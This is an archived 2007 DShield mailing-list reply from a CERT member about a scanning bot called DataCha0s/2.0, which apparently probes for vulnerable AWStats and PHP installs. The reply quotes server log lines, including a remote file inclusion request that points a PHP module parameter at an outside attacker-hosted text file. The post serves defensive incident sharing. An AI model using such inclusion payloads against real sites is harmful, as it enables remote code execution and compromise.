[Dshield] DataCha0s/2.0?

Koen Van Impe koen.vanimpe at belnet.be
Thu Apr 26 11:51:31 GMT 2007

Ryan McConigley wrote:
> Hi, I'm just curious, but has anyone else noticed a sudden rush of
> attempted web exploits from a script/bot that identifies itself as
> DataCha0s/2.0?


It looks like a bot that scans for vulnerable Perl AWStats installs
(throw DataCha0s in Google and you'll get a number of interesting hits).

We see similar attempts coming from,,,,
with requests like this:

[23/Apr/2007:05:26:32 +0200] "GET
/index.php?module=http://www.regimesyndicate.org/powned.txt? HTTP/1.0"
200 2306 "-" "DataCha0s/2.0"
[26/Apr/2007:02:58:28 +0200] "GET
HTTP/1.0" 500 534 "-" "DataCha0s/2.0"

Koen Van Impe - BELNET CERT
koen.vanimpe at belnet.be
PGP Key Id 0xED12AD79
Contact: http://cert.belnet.be/

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 252 bytes
Desc: OpenPGP digital signature
Url : http://lists.sans.org/pipermail/list/attachments/20070426/af0b1ca7/attachment.bin 

More information about the list mailing list